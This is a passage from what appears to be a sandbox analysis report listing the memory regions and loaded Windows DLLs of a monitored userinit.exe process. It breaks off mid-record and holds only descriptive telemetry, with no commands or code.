filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be840"
os_pid = "0x710"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4810
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4811
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4812
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4813
start_va = 0x110000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 4814
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 4815
start_va = 0xd80000
end_va = 0xd88fff
entry_point = 0xd80000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 4816
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4817
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4818
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 4819
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 4820
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 4821
start_va = 0x660000
end_va = 0x75ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 4822
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4823
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4824
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4825
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4826
start_va = 0x270000
end_va = 0x27ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 4827
start_va = 0x6d7b0000
end_va = 0x6d833fff
entry_point = 0x6d7b0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 4828
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 4829
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4830
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4831
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4832
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4833
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4834
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4835
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4836
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4837
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4838
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4839
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 4840
start_va = 0x150000
end_va = 0x217fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 4841
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4842
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4850
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4851
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4852
start_va = 0x280000
end_va = 0x380fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 4853
start_va = 0x630000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 4854
start_va = 0xd90000
end_va = 0x198ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d90000"
filename = ""
Region:
id = 4855
start_va = 0x470000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 4856
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4857
start_va = 0x760000
end_va = 0x91ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000760000"
filename = ""
Region:
id = 4860
start_va = 0x760000
end_va = 0x83efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000760000"
filename = ""
Region:
id = 4861
start_va = 0x8e0000
end_va = 0x91ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008e0000"
filename = ""
Region:
id = 4862
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 4863
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4864
start_va = 0x570000
end_va = 0x5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4865
start_va = 0x1990000
end_va = 0x22bffff
entry_point = 0x1990000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 4866
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 4867
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 4868
start_va = 0x920000
end_va = 0xd12fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000920000"
filename = ""
Region:
id = 4869
start_va = 0x840000
end_va = 0x8bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000840000"
filename = ""
Region:
id = 4870
start_va = 0x22c0000
end_va = 0x23ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000022c0000"
filename = ""
Region:
id = 4878
start_va = 0x23d0000
end_va = 0x24cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023d0000"
filename = ""
Region:
id = 4882
start_va = 0x24d0000
end_va = 0x26cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024d0000"
filename = ""
Region:
id = 4883
start_va = 0x26d0000
end_va = 0x2750fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4887
start_va = 0x2760000
end_va = 0x27e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 4888
start_va = 0x26d0000
end_va = 0x2754fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4889
start_va = 0x2760000
end_va = 0x27e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 4890
start_va = 0x26d0000
end_va = 0x2758fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4891
start_va = 0x2760000
end_va = 0x27eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 4896
start_va = 0x26d0000
end_va = 0x275cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4897
start_va = 0x2760000
end_va = 0x27eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002760000"
filename = ""
Region:
id = 4898
start_va = 0x27f0000
end_va = 0x2880fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 4899
start_va = 0x26d0000
end_va = 0x2762fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4902
start_va = 0x2770000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4903
start_va = 0x26d0000
end_va = 0x2766fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4904
start_va = 0x2770000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4905
start_va = 0x26d0000
end_va = 0x276afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4909
start_va = 0x2770000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4910
start_va = 0x26d0000
end_va = 0x276efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4911
start_va = 0x2770000
end_va = 0x2810fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 4915
start_va = 0x2820000
end_va = 0x28c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 4916
start_va = 0x26d0000
end_va = 0x2774fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4917
start_va = 0x2780000
end_va = 0x2826fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4921
start_va = 0x26d0000
end_va = 0x2778fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4922
start_va = 0x2780000
end_va = 0x282afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4923
start_va = 0x26d0000
end_va = 0x277cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4924
start_va = 0x2780000
end_va = 0x282efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4927
start_va = 0x2830000
end_va = 0x28e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 4928
start_va = 0x26d0000
end_va = 0x2782fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4929
start_va = 0x2790000
end_va = 0x2844fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4933
start_va = 0x26d0000
end_va = 0x2786fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4934
start_va = 0x2790000
end_va = 0x2848fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4935
start_va = 0x26d0000
end_va = 0x278afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4939
start_va = 0x2790000
end_va = 0x284cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4940
start_va = 0x26d0000
end_va = 0x278efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4941
start_va = 0x2790000
end_va = 0x2850fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4944
start_va = 0x2860000
end_va = 0x2922fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 4945
start_va = 0x26d0000
end_va = 0x2794fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4946
start_va = 0x27a0000
end_va = 0x2866fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 4947
start_va = 0x26d0000
end_va = 0x2798fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4951
start_va = 0x27a0000
end_va = 0x286afff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 4952
start_va = 0x26d0000
end_va = 0x279cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4955
start_va = 0x27a0000
end_va = 0x286efff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 4956
start_va = 0x2870000
end_va = 0x2940fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4957
start_va = 0x26d0000
end_va = 0x27a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4961
start_va = 0x27b0000
end_va = 0x2884fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4962
start_va = 0x26d0000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4963
start_va = 0x27b0000
end_va = 0x2888fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4966
start_va = 0x26d0000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4967
start_va = 0x27b0000
end_va = 0x288cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4968
start_va = 0x26d0000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4985
start_va = 0x27b0000
end_va = 0x2890fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4986
start_va = 0x28a0000
end_va = 0x2982fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 4987
start_va = 0x26d0000
end_va = 0x27b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4988
start_va = 0x27c0000
end_va = 0x28a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 4989
start_va = 0x26d0000
end_va = 0x27b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 4998
start_va = 0x27c0000
end_va = 0x28aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 4999
start_va = 0x26d0000
end_va = 0x27bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5016
start_va = 0x27c0000
end_va = 0x28aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 5017
start_va = 0x28b0000
end_va = 0x29a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 5022
start_va = 0x26d0000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5023
start_va = 0x27d0000
end_va = 0x28c4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 5024
start_va = 0x26d0000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5025
start_va = 0x27d0000
end_va = 0x28c8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 5026
start_va = 0x26d0000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5027
start_va = 0x27d0000
end_va = 0x28ccfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 5028
start_va = 0x26d0000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5029
start_va = 0x27d0000
end_va = 0x28d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 5030
start_va = 0x28e0000
end_va = 0x29e2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 5031
start_va = 0x26d0000
end_va = 0x27d4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5032
start_va = 0x27e0000
end_va = 0x28e6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 5033
start_va = 0x26d0000
end_va = 0x27d8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5034
start_va = 0x27e0000
end_va = 0x28eafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 5035
start_va = 0x26d0000
end_va = 0x27dcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 5036
start_va = 0x27e0000
end_va = 0x28effff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 5037
start_va = 0x28f0000
end_va = 0x2a02fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028f0000"
filename = ""
Region:
id = 5038
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 5039
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 5040
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 5041
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 5042
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5043
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 5044
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 5045
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x100000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 5046
start_va = 0x2a10000
end_va = 0x2b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 5047
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 5048
start_va = 0x6d770000
end_va = 0x6d788fff
entry_point = 0x6d770000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 5049
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5050
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5051
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5052
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5053
start_va = 0x2c30000
end_va = 0x2d2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c30000"
filename = ""
Region:
id = 5054
start_va = 0x2d80000
end_va = 0x2dbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d80000"
filename = ""
Region:
id = 5055
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 5056
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 5057
start_va = 0x2dc0000
end_va = 0x308efff
entry_point = 0x2dc0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5058
start_va = 0x230000
end_va = 0x231fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 5059
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 5060
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x240000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 5061
start_va = 0x250000
end_va = 0x251fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 5062
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5063
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 5064
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 5065
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 5066
start_va = 0x390000
end_va = 0x3bbfff
entry_point = 0x390000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 5067
start_va = 0x260000
end_va = 0x267fff
entry_point = 0x260000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 5068
start_va = 0x3c0000
end_va = 0x3cffff
entry_point = 0x3c0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 5069
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5070
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5071
start_va = 0x2b10000
end_va = 0x2baffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b10000"
filename = ""
Region:
id = 5072
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 5073
start_va = 0x3090000
end_va = 0x320ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003090000"
filename = ""
Region:
id = 5074
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
